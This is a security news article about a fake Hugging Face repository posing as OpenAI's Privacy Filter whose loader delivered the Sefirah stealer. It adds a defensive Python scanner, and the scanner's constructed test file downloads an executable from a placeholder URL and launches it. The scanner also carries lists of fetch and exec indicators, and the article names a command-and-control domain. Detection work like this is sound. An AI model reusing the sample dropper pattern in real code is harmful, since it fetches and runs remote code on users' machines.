A malicious Hugging Face repository impersonating OpenAI’s Privacy Filter reached number 1 on the platform’s trending list. The fake repository, named Open-OSS/privacy-filter, accumulated 244,000 downloads and 667 likes within 18 hours before it was removed. HiddenLayer researchers discovered the typosquatting campaign on May 7 after noticing suspicious activity on the platform.
The malicious repository copied OpenAI’s legitimate Privacy Filter model card nearly verbatim to trick users. Behind that model card, a loader.py file fetched and executed a Rust-based information stealer called Sefirah on Windows machines. The stealer targeted browser data, Discord tokens, cryptocurrency wallet information, and stored credentials on infected systems.
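The loader.py described above has the download-and-execute shape that a defender can check for before importing anything from a model repository. The following Python script is an added example, not code from the article, HiddenLayer or OpenAI: it walks a local snapshot of a repository and flags any Python file that both fetches a remote resource and executes code or spawns a process. The call lists are an assumed triage heuristic, and the two sample files (including the example.invalid URL) are constructed for illustration, not indicators from the campaign.

```python
"""Triage scanner for Python files in a downloaded model repository (added
example). The indicator lists are an assumed heuristic: a hit means "inspect
this file by hand", not proof of malware."""
import ast
import os
import tempfile
from dataclasses import dataclass

# Assumed indicators: matched on the bare name or the fully qualified dotted name.
FETCH_BARE = {"urlopen", "urlretrieve"}
FETCH_QUALIFIED = {"requests.get", "requests.post",
                   "urllib.request.urlopen", "urllib.request.urlretrieve"}
EXEC_BARE = {"exec", "eval", "Popen", "system", "startfile", "check_output"}
EXEC_QUALIFIED = {"subprocess.run", "subprocess.call", "subprocess.check_output",
                  "subprocess.Popen", "os.system", "os.startfile", "os.popen",
                  "os.execv", "os.execve"}


@dataclass
class Finding:
    path: str
    fetch_calls: list          # [(dotted call name, line number)]
    exec_calls: list
    parse_error: bool = False

    @property
    def is_dropper(self) -> bool:
        # Fetch plus execute in one file is the pattern worth a manual look.
        return bool(self.fetch_calls) and bool(self.exec_calls)


def _dotted(func: ast.expr) -> str:
    """Return 'pkg.mod.func' for an attribute chain, or the bare name."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def analyse_source(path: str, source: str) -> Finding:
    """Walk the AST once and collect fetch-style and exec-style calls."""
    try:
        tree = ast.parse(source, filename=path)
    except SyntaxError:
        # A model repo shipping unparsable Python is itself worth a look.
        return Finding(path, [], [], parse_error=True)
    fetch, execs = [], []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        last = name.rsplit(".", 1)[-1]
        if name in FETCH_QUALIFIED or last in FETCH_BARE:
            fetch.append((name, node.lineno))
        if name in EXEC_QUALIFIED or last in EXEC_BARE:
            execs.append((name, node.lineno))
    return Finding(path, fetch, execs)


def scan_repo(root: str) -> list:
    """Report every .py file under root that looks like a dropper or failed to parse."""
    report = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".py"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                finding = analyse_source(path, fh.read())
            if finding.is_dropper or finding.parse_error:
                report.append(finding)
    return report


# Constructed sample files (illustration only; the URL is a placeholder).
CONSTRUCTED_LOADER = '''import urllib.request, subprocess, os, tempfile

def load_model():
    url = "https://example.invalid/model-patch.bin"   # placeholder, not a real IoC
    dest = os.path.join(tempfile.gettempdir(), "model-patch.exe")
    urllib.request.urlretrieve(url, dest)
    subprocess.Popen([dest])
'''
CONSTRUCTED_BENIGN = '''from transformers import AutoModelForTokenClassification, AutoTokenizer

def load_model(name):
    tok = AutoTokenizer.from_pretrained(name)
    return tok, AutoModelForTokenClassification.from_pretrained(name)
'''


def demo() -> list:
    """Write the constructed files to a temp dir, scan it, return flagged base names."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "loader.py"), "w", encoding="utf-8") as fh:
            fh.write(CONSTRUCTED_LOADER)
        with open(os.path.join(root, "modeling.py"), "w", encoding="utf-8") as fh:
            fh.write(CONSTRUCTED_BENIGN)
        return sorted(os.path.basename(f.path) for f in scan_repo(root))


if __name__ == "__main__":
    print("flagged:", demo())
```

Run it against a repository snapshot with `scan_repo("/path/to/snapshot")`; the constructed loader is reported (one fetch call, one process spawn), while the benign `from_pretrained` loader is not. Because the check is a static heuristic, treat a clean result as "nothing obvious", not as a clean bill of health.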
OpenAI released the legitimate Privacy Filter in April 2026 under the Apache 2.0 license on GitHub. The model detects and redacts personally identifiable information in unstructured text. The bidirectional token classifier has 1.5 billion parameters and supports context windows of up to 128,000 tokens.
HiddenLayer suspects the download count and likes were artificially inflated to create an illusion of trustworthiness: the vast majority of the 667 accounts that liked the repository appear to be auto-generated. Researchers also uncovered six more repositories with similar Python loaders deploying the same stealer infrastructure.
The campaign overlaps with an npm typosquatting operation distributing the WinOS 4.0 implant, and HiddenLayer traced its command-and-control servers to the welovechinatown.info domain, previously used in ValleyRAT campaigns. Users who downloaded files from the malicious repository should reimage affected machines, rotate credentials, and replace cryptocurrency wallets immediately.
